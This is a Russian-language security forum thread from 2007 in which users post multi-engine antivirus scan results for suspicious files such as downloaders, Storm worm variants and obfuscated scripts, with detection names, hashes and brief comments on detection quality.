Sunbelt	2.2.907.0	2007.08.25	-
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
*VBA32	3.12.2.3	2007.08.30	Trojan.Win32.Inject.dj*
VirusBuster	4.3.26:9	2007.08.30	-
*Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Dldr.LooksLike.Tiny!7782*
Additional information
File size: 3730 bytes
MD5: a7e49a314b2cba8f8c5f073ff08bd29e
SHA1: 2371c27b28a5a76787ee47b5b842b55ea779f73c

----------


## maXmo

AhnLab-V3	2007.9.1.0	2007.08.31	-
*AntiVir	7.4.1.66	2007.08.31	TR/Dldr.Small.ety.5*
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
*AVG	7.5.0.484	2007.08.31	Obfustat.JDC*
BitDefender	7.2	2007.08.31	-
*CAT-QuickHeal	9.00	2007.08.31	(Suspicious) - DNAScan*
ClamAV	0.91.2	2007.08.31	-
*DrWeb	4.33	2007.08.31	Trojan.Packed.166
eSafe	7.0.15.0	2007.08.29	suspicious Trojan/Worm*
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
*Fortinet	3.11.0.0	2007.08.31	W32/Small.ETY!tr.dldr*
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Trojan-Downloader.Win32.Small.ety
Ikarus	T3.1.1.12	2007.08.31	Trojan-PWS.Win32.LdPinch.atw
Kaspersky	4.0.2.24	2007.08.31	Trojan-Downloader.Win32.Small.ety
McAfee	5109	2007.08.30	New Malware.bl*
Microsoft	1.2803	2007.08.31	-
NOD32v2	2493	2007.08.31	-
*Norman	5.80.02	2007.08.31	W32/DLoader.DEUB
Panda	9.0.0.4	2007.08.31	Generic Malware*
Prevx1	V2	2007.08.31	-
*Rising	19.38.42.00	2007.08.31	Packer.RyCrypt
Sophos	4.21.0	2007.08.31	Mal/EncPk-AW
Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.31	-
*TheHacker	6.1.9.175	2007.08.31	Trojan/Downloader.Small.ety
VBA32	3.12.2.3	2007.08.30	Trojan-Downloader.Win32.Small.ety
VirusBuster	4.3.26:9	2007.08.30	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Dldr.Small.ety.5*
Additional information
File size: 14790 bytes
MD5: d175dbe7caf6fda6bb6395462516d7fd
SHA1: 1622c193cd9e81528ced6bdb6e11fc32d32b5a83
packers: RCrypt

по ходу просто даунлоадер, буду смотреть, чего он там надаунлоадил  :Cheesy: 

…мдя

*Добавлено через 1 час 2 минуты*

накачал-таки…

AhnLab-V3	2007.9.1.0	2007.08.31	-
*AntiVir	7.4.1.66	2007.08.31	TR/Crypt.U.Gen*
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
AVG	7.5.0.484	2007.08.31	-
BitDefender	7.2	2007.08.31	-
CAT-QuickHeal	9.00	2007.08.31	-
ClamAV	0.91.2	2007.08.31	-
*DrWeb	4.33	2007.08.31	Trojan.PWS.LDPinch.1941
eSafe	7.0.15.0	2007.08.29	suspicious Trojan/Worm*
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Trojan-PSW.Win32.LdPinch.cgu*
Ikarus	T3.1.1.12	2007.08.31	-
*Kaspersky	4.0.2.24	2007.08.31	Trojan-PSW.Win32.LdPinch.cgu
McAfee	5109	2007.08.30	New Malware.bm*
Microsoft	1.2803	2007.08.31	-
NOD32v2	2493	2007.08.31	-
Norman	5.80.02	2007.08.31	-
Panda	9.0.0.4	2007.08.31	-
Prevx1	V2	2007.08.31	-
Rising	19.38.42.00	2007.08.31	-
*Sophos	4.21.0	2007.08.31	Mal/Basine-C
Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
VBA32	3.12.2.3	2007.08.30	-
VirusBuster	4.3.26:9	2007.08.30	-
*Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Crypt.U.Gen*

Additional information
File size: 20480 bytes
MD5: 0a5c7f5e109b57f67ef2a68bd5235e7d
SHA1: e176d36fabdfca20620a83948118c60c9c5dfbe2


AhnLab-V3	2007.9.1.0	2007.08.31	-
AntiVir	7.4.1.66	2007.08.31	-
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
AVG	7.5.0.484	2007.08.31	-
BitDefender	7.2	2007.08.31	-
CAT-QuickHeal	9.00	2007.08.31	-
ClamAV	0.91.2	2007.08.31	-
DrWeb	4.33	2007.08.31	-
eSafe	7.0.15.0	2007.08.29	-
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
F-Prot	4.3.2.48	2007.08.31	-
F-Secure	6.70.13030.0	2007.08.31	-
*Ikarus	T3.1.1.12	2007.08.31	Win32.SuspectCrc*
Kaspersky	4.0.2.24	2007.08.31	-
McAfee	5109	2007.08.30	-
Microsoft	1.2803	2007.08.31	-
NOD32v2	2493	2007.08.31	-
*Norman	5.80.02	2007.08.31	W32/Xorpix.ED*
Panda	9.0.0.4	2007.08.31	-
Prevx1	V2	2007.08.31	-
Rising	19.38.42.00	2007.08.31	-
Sophos	4.21.0	2007.08.31	-
*Sunbelt	2.2.907.0	2007.08.25	Trojan-Downloader.Win32.Small.nhl*
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
VBA32	3.12.2.3	2007.08.30	-
VirusBuster	4.3.26:9	2007.08.30	-
Webwasher-Gateway	6.0.1	2007.08.31	-

Additional information
File size: 2560 bytes
MD5: 58df7dc91763549d858991505ae65f3c
SHA1: 5a7f105b498b2e2cd29895c9915480b434fce16f

вот и думай, ложняки или нет


*AhnLab-V3	2007.9.1.0	2007.08.31	Win-Trojan/Downloader.12375
AntiVir	7.4.1.66	2007.08.31	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
*AVG	7.5.0.484	2007.08.31	Downloader.Generic6.AUO
BitDefender	7.2	2007.08.31	Trojan.AVKiller.AS
CAT-QuickHeal	9.00	2007.08.31	TrojanDownloader.Small.evl*
ClamAV	0.91.2	2007.08.31	-
*DrWeb	4.33	2007.08.31	Trojan.MulDrop.8347
eSafe	7.0.15.0	2007.08.29	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Trojan-Downloader.Win32.Small.evl
Ikarus	T3.1.1.12	2007.08.31	Trojan-Downloader.Win32.Small.evl
Kaspersky	4.0.2.24	2007.08.31	Trojan-Downloader.Win32.Small.evl*
McAfee	5109	2007.08.30	-
Microsoft	1.2803	2007.08.31	-
NOD32v2	2493	2007.08.31	-
Norman	5.80.02	2007.08.31	-
*Panda	9.0.0.4	2007.08.31	Suspicious file
Prevx1	V2	2007.08.31	Generic.Malware*
Rising	19.38.42.00	2007.08.31	-
Sophos	4.21.0	2007.08.31	-
Sunbelt	2.2.907.0	2007.08.25	-
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
VBA32	3.12.2.3	2007.08.30	-
*VirusBuster	4.3.26:9	2007.08.30	Trojan.DL.Small.VIY
Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Crypt.XPACK.Gen*

Additional information
File size: 12375 bytes
MD5: 57f3e4dcefb97222c500a655a451a62a
SHA1: 20f6835a99218eb0410dec50ccf8bd483a2e7ad3
Prevx info: http://fileinfo.prevx.com/fileinfo.a...3B8B00D916ABC2

----------


## icon

> Norman 5.80.02 2007.08.31 W32/Xorpix.ED


Хотя бы Норман заставляет задуматься.  :Smiley:

----------


## Макcим

File index.html received on 08.31.2007 19:06:45 (CET)


> AhnLab-V3	2007.9.1.0	2007.08.31	-
> *AntiVir	7.4.1.66	2007.08.31	HTML/Crypted.Gen*
> Authentium	4.93.8	2007.08.31	-
> Avast	4.7.1029.0	2007.08.30	-
> AVG	7.5.0.484	2007.08.31	-
> BitDefender	7.2	2007.08.31	-
> CAT-QuickHeal	9.00	2007.08.31	-
> ClamAV	0.91.2	2007.08.31	-
> DrWeb	4.33	2007.08.31	-
> ...

----------


## Winsent

File _________________________________ received on 08.31.2007 20:37:43 (CET)
Current status:    finished 
Result: 9/32 (28.13%) 

Antivirus	Version	Last Update	Result

AhnLab-V3	2007.9.1.0	2007.08.31	-
*AntiVir	7.4.1.66	2007.08.31	HEUR/Malware*
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.31	-
*AVG	7.5.0.484	2007.08.31	Worm/Agobot.FWG*
BitDefender	7.2	2007.08.31	-
CAT-QuickHeal	9.00	2007.08.31	-
ClamAV	0.91.2	2007.08.31	-
DrWeb	4.33	2007.08.31	-
eSafe	7.0.15.0	2007.08.29	-
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.31	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Trojan-Dropper.Win32.Agent.bro*
Ikarus	T3.1.1.12	2007.08.31	-
*Kaspersky	4.0.2.24	2007.08.31	Trojan-Dropper.Win32.Agent.bro
McAfee	5110	2007.08.31	New Malware.n*
Microsoft	1.2803	2007.08.31	-
NOD32v2	2494	2007.08.31	-
Norman	5.80.02	2007.08.31	-
*Panda	9.0.0.4	2007.08.31	Suspicious file*
Prevx1	V2	2007.08.31	-
Rising	19.38.42.00	2007.08.31	-
*Sophos	4.21.0	2007.08.31	Mal/Packer*
Sunbelt	2.2.907.0	2007.08.25	-
Symantec	10	2007.08.31	-
TheHacker	6.1.9.175	2007.08.31	-
*VBA32	3.12.2.3	2007.08.30	Backdoor.Win32.Agobot.ajr*
VirusBuster	4.3.26:9	2007.08.31	-
*Webwasher-Gateway	6.0.1	2007.08.31	Heuristic.Malware*

Additional information
File size: 156686 bytes
MD5: 8fa1d7c14d11d2b45c72771a97677366
SHA1: 4b3ece5ddccc3bfa7a3ce3881f6e41e30cbba4ba
packers: UPACK

----------


## Winsent

File INFO.txt_.scr received on 09.01.2007 15:21:02 (CET)
Current status:    finished 
Result: 14/32 (43.75%) 


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.9.1.0	2007.09.01	-
*AntiVir	7.4.1.66	2007.08.31	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.09.01	-
*Avast	4.7.1029.0	2007.09.01	Win32:Mytob-TC
AVG	7.5.0.484	2007.08.31	Generic7.CXR*
BitDefender	7.2	2007.09.01	*GenPack:[email protected]
CAT-QuickHeal	9.00	2007.09.01	(Suspicious) - DNAScan*
ClamAV	0.91.2	2007.09.01	-
DrWeb	4.33	2007.09.01	-
*eSafe	7.0.15.0	2007.08.29	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5100	2007.08.31	-
Ewido	4.0	2007.09.01	-
FileAdvisor	1	2007.09.01	-
Fortinet	3.11.0.0	2007.09.01	-
F-Prot	4.3.2.48	2007.08.31	-
*F-Secure	6.70.13030.0	2007.08.31	Net-Worm.Win32.Mytob.ft
Ikarus	T3.1.1.12	2007.09.01	Backdoor.Win32.IRCBot.acd
Kaspersky	4.0.2.24	2007.09.01	Net-Worm.Win32.Mytob.ft*
McAfee	5110	2007.08.31	-
Microsoft	1.2803	2007.09.01	-
*NOD32v2	2495	2007.09.01	Win32/Mytob.VW*
Norman	5.80.02	2007.08.31	-
*Panda	9.0.0.4	2007.09.01	Suspicious file*
Prevx1	V2	2007.09.01	-
*Rising	19.38.52.00	2007.09.01	Backdoor.Win32.IRCbot.bcr*
Sophos	4.21.0	2007.09.01	-
Sunbelt	2.2.907.0	2007.08.31	-
*Symantec	10	2007.09.01	W32.IRCBot.Gen*
TheHacker	6.1.9.175	2007.08.31	-
VBA32	3.12.2.3	2007.09.01	-
VirusBuster	4.3.26:9	2007.08.31	-
*Webwasher-Gateway	6.0.1	2007.08.31	Trojan.Crypt.XPACK.Gen*

Additional information
File size: 144896 bytes
MD5: 016fb3fe28384a10a78cfafdc87c417d
SHA1: 151f2ac08bf39d775b83a8b6cb17bee458ac3d81
packers: NTKrnl

----------


## Mr.Page

File sysuusi.exe received on 09.02.2007 17:51:34 (CET)
Result: 7/32 *21.88%*

Antivirus Version Last Update Result 

AhnLab-V3 2007.9.1.0 2007.09.01 - 
AntiVir 7.4.1.66 2007.09.01 - 
Authentium 4.93.8 2007.09.02 - 
Avast 4.7.1029.0 2007.09.01 - 
AVG 7.5.0.484 2007.09.02 - 
BitDefender 7.2 2007.09.02 - 
CAT-QuickHeal 9.00 2007.09.01 - 
ClamAV 0.91.2 2007.09.02 - 
*DrWeb 4.33 2007.09.02 Trojan.MulDrop.8473* 
*eSafe 7.0.15.0 2007.09.02 Win32.QQPass* 
eTrust-Vet 31.1.5100 2007.08.31 - 
Ewido 4.0 2007.09.02 - 
FileAdvisor 1 2007.09.02 - 
Fortinet 3.11.0.0 2007.09.02 - 
F-Prot 4.3.2.48 2007.09.02 - 
*F-Secure 6.70.13030.0 2007.09.02 Trojan-Spy.Win32.Webmoner.do* 
*Ikarus T3.1.1.12 2007.09.02 Trojan-Dropper.Win32.Delf.MM* 
*Kaspersky 4.0.2.24 2007.09.02 Trojan-Spy.Win32.Webmoner.do* 
McAfee 5110 2007.08.31 - 
Microsoft 1.2803 2007.09.02 - 
NOD32v2 2497 2007.09.01 - 
*Norman 5.80.02 2007.09.02 W32/Malware.AHSU* 
*Panda 9.0.0.4 2007.09.02 Suspicious file* 
Prevx1 V2 2007.09.02 - 
Rising 19.38.62.00 2007.09.02 - 
Sophos 4.21.0 2007.09.02 - 
Sunbelt 2.2.907.0 2007.08.31 - 
Symantec 10 2007.09.02 - 
TheHacker 6.1.9.175 2007.09.02 - 
VBA32 3.12.2.3 2007.09.01 - 
VirusBuster 4.3.26:9 2007.09.02 - 
Webwasher-Gateway 6.0.1 2007.09.01 - 

Additional information 
File size: 18432 bytes 
MD5: 4a7a6d06b861b9da75434d7fc85f767a 
SHA1: f6d36dcb0b8bf37995cb85ecc585015f663a7585

----------


## drongo

T=12139


```
AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.02	HEUR/Crypted
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.02	-
AVG	7.5.0.484	2007.09.02	Obfustat.JZS
BitDefender	7.2	2007.09.03	-
CAT-QuickHeal	9.00	2007.09.01	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.03	-
DrWeb	4.33	2007.09.03	-
eSafe	7.0.15.0	2007.09.02	-
eTrust-Vet	31.1.5100	2007.08.31	-
Ewido	4.0	2007.09.02	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	-
Ikarus	T3.1.1.12	2007.09.03	Email-Worm.Win32.Locksky.be
Kaspersky	4.0.2.24	2007.09.03	-
McAfee	5110	2007.08.31	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2498	2007.09.03	-
Norman	5.80.02	2007.09.02	W32/Tibs.ASKH
Panda	9.0.0.4	2007.09.02	Suspicious file
Prevx1	V2	2007.09.03	Trojan.VXGAME
Rising	19.39.01.00	2007.09.03	Trojan.Win32.Agent.vyl
Sophos	4.21.0	2007.09.03	-
Symantec	10	2007.09.03	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.01	-
VirusBuster	4.3.26:9	2007.09.02	Packed/FRBR
Webwasher-Gateway	6.0.1	2007.09.02	Heuristic.Crypted
Additional information
File size: 11264 bytes
MD5: 7c4ca0b78d51494df0aadd61dcee6f30
SHA1: 33c1257bd894ef72951e5233bf35ef0c756a7800
packers: BINARYRES
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=2985B6FE002E09362CBC004B1E87A000DDF2FF76
```

----------


## mayas

ile default.php received on 09.03.2007 18:51:09 (CET)
Result: 4/32 (12.5%)


Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.03	*HTML/Crypted.Gen*
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.03	-
AVG	7.5.0.485	2007.09.03	-
BitDefender	7.2	2007.09.03	-
CAT-QuickHeal	9.00	2007.09.03	-
ClamAV	0.91.2	2007.09.03	-
DrWeb	4.33	2007.09.03	-
eSafe	7.0.15.0	2007.09.02	-
eTrust-Vet	31.1.5105	2007.09.03	-
Ewido	4.0	2007.09.03	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	*Trojan-Clicker.HTML.IFrame.ac*
Ikarus	T3.1.1.12	2007.09.03	-
Kaspersky	4.0.2.24	2007.09.03	*Trojan-Clicker.HTML.IFrame.ac*
McAfee	5110	2007.08.31	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2499	2007.09.03	-
Norman	5.80.02	2007.09.03	-
Panda	9.0.0.4	2007.09.03	-
Prevx1	V2	2007.09.03	-
Rising	19.39.02.00	2007.09.03	-
Sophos	4.21.0	2007.09.03	-
Sunbelt	2.2.907.0	2007.08.31	-
Symantec	10	2007.09.03	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.03	-
VirusBuster	4.3.26:9	2007.09.03	-
Webwasher-Gateway	6.0.1	2007.09.03	*Script.Crypted.Gen*

----------


## XL

Очередной штормовой zhelatin




> File labor.exe received on 09.03.2007 21:23:32 (CET)
> Current status:    finished 
> Result: 15/32 (46.88%) 
>  Compact 
> Print results  Antivirus	Version	Last Update	Result
> AhnLab-V3	2007.9.1.0	2007.09.03	-
> *AntiVir	7.4.1.66	2007.09.03	Worm/Storm.tch*
> Authentium	4.93.8	2007.09.02	-
> Avast	4.7.1029.0	2007.09.03	-
> ...

----------


## drongo

t=12160


```
File avz00001.dta received on 09.03.2007 22:26:26 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.03	-
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.03	-
AVG	7.5.0.485	2007.09.03	PSW.Agent.NWI
BitDefender	7.2	2007.09.03	-
CAT-QuickHeal	9.00	2007.09.03	-
ClamAV	0.91.2	2007.09.03	Trojan.Agent-7550
DrWeb	4.33	2007.09.03	Trojan.NtRootKit.361
eSafe	7.0.15.0	2007.09.03	-
eTrust-Vet	31.1.5105	2007.09.03	-
Ewido	4.0	2007.09.03	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	-
Ikarus	T3.1.1.12	2007.09.03	-
Kaspersky	4.0.2.24	2007.09.03	-
McAfee	5111	2007.09.03	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2500	2007.09.03	Win32/SpamTool.Agent.NAJ
Norman	5.80.02	2007.09.03	-
Panda	9.0.0.4	2007.09.03	-
Prevx1	V2	2007.09.03	-
Rising	19.39.02.00	2007.09.03	-
Sophos	4.21.0	2007.09.03	-
Sunbelt	2.2.907.0	2007.08.31	-
Symantec	10	2007.09.03	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.03	-
VirusBuster	4.3.26:9	2007.09.03	-
Webwasher-Gateway	6.0.1	2007.09.03	-
Additional information
File size: 18944 bytes
MD5: 13a366eef1bf920ffcf754716fda7ade
SHA1: a614eae1da5ee91f034958e23ebd8410ae981115
```


Совсем свежая гадость :Никто ещё толком не знает :


```
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.03	HEUR/Crypted
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.03	-
AVG	7.5.0.485	2007.09.03	Win32/PolyCrypt
BitDefender	7.2	2007.09.03	-
CAT-QuickHeal	9.00	2007.09.03	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.03	-
DrWeb	4.33	2007.09.03	-
eSafe	7.0.15.0	2007.09.03	Suspicious Trojan/Worm
eTrust-Vet	31.1.5105	2007.09.03	-
Ewido	4.0	2007.09.03	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	-
Ikarus	T3.1.1.12	2007.09.03	-
Kaspersky	4.0.2.24	2007.09.03	-
McAfee	5111	2007.09.03	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2500	2007.09.03	-
Norman	5.80.02	2007.09.03	-
Panda	9.0.0.4	2007.09.03	Suspicious file
Prevx1	V2	2007.09.03	-
Rising	19.39.02.00	2007.09.03	-
Sophos	4.21.0	2007.09.03	-
Sunbelt	2.2.907.0	2007.08.31	VIPRE.Suspicious
Symantec	10	2007.09.03	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.03	-
VirusBuster	4.3.26:9	2007.09.03	-
Webwasher-Gateway	6.0.1	2007.09.03	Heuristic.Crypted
Additional information
File size: 39317 bytes
MD5: e11af9ecc9308640109cd11b121325b1
SHA1: fb1be9b5ebc55a942b2c9241fa32a37e2a05d792
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
```

----------


## Kuzz

Antivirus Version Last Update Result 
AhnLab-V3 2007.9.5.0 2007.09.05 - 
*AntiVir 7.6.0.5 2007.09.05 Worm/Sdbot.477184.1* 
Authentium 4.93.8 2007.09.05 - 
Avast 4.7.1029.0 2007.09.05 - 
*AVG 7.5.0.485 2007.09.05 SHeur.WT* 
*BitDefender 7.2 2007.09.05 DeepScan:Generic.Sdbot.EF3BEBB4 
CAT-QuickHeal 9.00 2007.09.05 Backdoor.SdBot.gen 
ClamAV 0.91.2 2007.09.05 Trojan.SdBot-6773* 
DrWeb 4.33 2007.09.05 - 
eSafe 7.0.15.0 2007.09.04 - 
*eTrust-Vet 31.1.5111 2007.09.05 Win32/Rbot.HNM* 
Ewido 4.0 2007.09.05 - 
FileAdvisor 1 2007.09.05 - 
Fortinet 3.11.0.0 2007.09.05 - 
F-Prot 4.3.2.48 2007.09.05 - 
F-Secure 6.70.13030.0 2007.09.05 - 
*Ikarus T3.1.1.12 2007.09.05 Backdoor.VB.EV* 
Kaspersky 4.0.2.24 2007.09.05 - 
McAfee 5112 2007.09.04 - 
Microsoft 1.2803 2007.09.05 - 
*NOD32v2 2507 2007.09.05 a variant of Win32/Packed.Themida* 
Norman 5.80.02 2007.09.05 - 
*Panda 9.0.0.4 2007.09.05 W32/Gaobot.OXI.worm* 
Prevx1 V2 2007.09.05 - 
*Rising 19.39.22.00 2007.09.05 Backdoor.Win32.Gaobot.puv* 
Sophos 4.21.0 2007.09.05 - 
*Sunbelt 2.2.907.0 2007.09.05 VIPRE.Suspicious 
Symantec 10 2007.09.05 W32.Spybot.Worm* 
TheHacker 6.1.9.178 2007.09.05 - 
VBA32 3.12.2.3 2007.09.04 - 
VirusBuster 4.3.26:9 2007.09.05 - 
*Webwasher-Gateway 6.0.1 2007.09.05 Worm.Sdbot.477184.1* 
Additional information 
File size: 480256 bytes 
MD5: a54dc72f86874da7b1ece729d2a2cd7f 
SHA1: 67540d3afa9e7793e157911c93944adb8d67c274 
packers: Themida 
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

Нод уже начал детектить только пакеры-крипторы??

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## XL

Обновление штормового желатина.
Файл tor.exe получен 2007.09.06 20:31:50 (CET)




> AhnLab-V3	2007.9.5.0	2007.09.06	-
> *AntiVir	7.6.0.5	2007.09.06	Worm/Stom.tcl*
> Authentium	4.93.8	2007.09.06	-
> Avast	4.7.1029.0	2007.09.06	-
> *AVG	7.5.0.485	2007.09.06	Downloader.Tibs
> BitDefender	7.2	2007.09.06	Trojan.Peed.IID
> CAT-QuickHeal	9.00	2007.09.06	(Suspicious) - DNAScan*
> ClamAV	0.91.2	2007.09.06	-
> *DrWeb	4.33	2007.09.06	Trojan.Packed.142
> ...

----------


## Синауридзе Александр

Файл svcipa.exe получен 2007.09.09 13:45:44 (CET)

AhnLab-V3 2007.9.8.0 2007.09.07 - 
AntiVir 7.6.0.5 2007.09.08 - 
Authentium 4.93.8 2007.09.07 - 
Avast 4.7.1043.0 2007.09.08 - 
AVG 7.5.0.485 2007.09.09 - 
BitDefender 7.2 2007.09.09 - 
CAT-QuickHeal 9.00 2007.09.08 - 
ClamAV 0.91.2 2007.09.09 - 
*DrWeb 4.33 2007.09.08 Trojan.DownLoader.32552* 
*eSafe 7.0.15.0 2007.09.04 suspicious Trojan/Worm* 
eTrust-Vet 31.1.5119 2007.09.08 - 
Ewido 4.0 2007.09.09 - 
FileAdvisor 1 2007.09.09 - 
Fortinet 3.11.0.0 2007.09.08 - 
F-Prot 4.3.2.48 2007.09.09 - 
F-Secure 6.70.13030.0 2007.09.09 - 
*Ikarus T3.1.1.12 2007.09.09 Backdoor.Win32.Agent.ark* 
Kaspersky 4.0.2.24 2007.09.09 - 
McAfee 5115 2007.09.07 - 
Microsoft 1.2803 2007.09.09 - 
NOD32v2 2515 2007.09.09 - 
Norman 5.80.02 2007.09.07 - 
*Panda 9.0.0.4 2007.09.09 Trj/Agent.GKG* 
Prevx1 V2 2007.09.09 - 
Rising 19.39.62.00 2007.09.09 - 
*Sophos 4.21.0 2007.09.09 Mal/HckPk-A* 
Sunbelt 2.2.907.0 2007.09.07 - 
Symantec 10 2007.09.09 - 
TheHacker 6.1.10.182 2007.09.08 - 
VBA32 3.12.2.4 2007.09.08 - 
VirusBuster 4.3.26:9 2007.09.08 - 
*Webwasher-Gateway 6.0.1 2007.09.08 Win32.ModifiedUPX.gen!84 (suspicious)* 

Дополнительная информация 
File size: 21690 bytes 
MD5: d88e8c2198e685f0907c77a396dc6a7e 
SHA1: f08536f58d94e610b913dd25eeb6cf67b97083a3 
packers: UPX

----------


## Winsent

Файл index.html получен 2007.09.09 19:05:23 (CET)
Текущий статус:   закончено 
Результат: 7/32 (21.88%) 


Антивирус	Версия	Обновление	Результат

AhnLab-V3	2007.9.8.0	2007.09.07	-
AntiVir	7.6.0.5	2007.09.08	-
Authentium	4.93.8	2007.09.09	-
Avast	4.7.1043.0	2007.09.08	-
*AVG	7.5.0.485	2007.09.09	JS/Psyme*
BitDefender	7.2	2007.09.09	-
CAT-QuickHeal	9.00	2007.09.08	-
*ClamAV	0.91.2	2007.09.09	JS.Agent-3*
DrWeb	4.33	2007.09.08	-
*eSafe	7.0.15.0	2007.09.04	JS.Feebs*
eTrust-Vet	31.1.5119	2007.09.08	-
Ewido	4.0	2007.09.09	-
FileAdvisor	1	2007.09.09	-
Fortinet	3.11.0.0	2007.09.08	-
F-Prot	4.3.2.48	2007.09.09	-
*F-Secure	6.70.13030.0	2007.09.09	Trojan-Clicker.JS.Agent.h*
Ikarus	T3.1.1.12	2007.09.09	-
*Kaspersky	4.0.2.24	2007.09.09	Trojan-Clicker.JS.Agent.h*
McAfee	5115	2007.09.07	-
*Microsoft	1.2803	2007.09.09	TrojanDownloader:JS/Psyme.gen*
NOD32v2	2515	2007.09.09	-
Norman	5.80.02	2007.09.07	-
Panda	9.0.0.4	2007.09.09	-
Prevx1	V2	2007.09.09	-
Rising	19.39.62.00	2007.09.09	-
*Sophos	4.21.0	2007.09.09	Mal/ObfJS-C*
Sunbelt	2.2.907.0	2007.09.07	-
Symantec	10	2007.09.09	-
TheHacker	6.1.10.182	2007.09.08	-
VBA32	3.12.2.4	2007.09.08	-
VirusBuster	4.3.26:9	2007.09.09	-
Webwasher-Gateway	6.0.1	2007.09.08	-

Дополнительная информация
File size: 11472 bytes
MD5: 86e1b9b9ac2cae2ed352cfedc17aeae4
SHA1: 73ab0cdde208ae8ce9b759e3422abef38ac77e1c

----------


## XL

Обновился *zhelatin*

Файл tracker.exe получен 2007.09.10 15:09:56 (CET)
Текущий статус:    закончено 
Результат: 9/32 (28.13%) 




> AhnLab-V3	2007.9.11.0	2007.09.10	-
> AntiVir	7.6.0.5	2007.09.10	-
> Authentium	4.93.8	2007.09.09	-
> Avast	4.7.1043.0	2007.09.10	-
> AVG	7.5.0.485	2007.09.10	-
> BitDefender	7.2	2007.09.10	-
> *CAT-QuickHeal	9.00	2007.09.10	(Suspicious) - DNAScan*
> ClamAV	0.91.2	2007.09.10	-
> DrWeb	4.33	2007.09.10	-
> ...

----------


## ISO

Файл ntldr.exe получен 2007.09.11 08:56:03 (CET)
Текущий статус:    закончено 
Результат: 13/32 (40.63%) 
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.11.1	2007.09.11	-
*AntiVir	7.6.0.5	2007.09.10	TR/Crypt.XPACK.Gen*
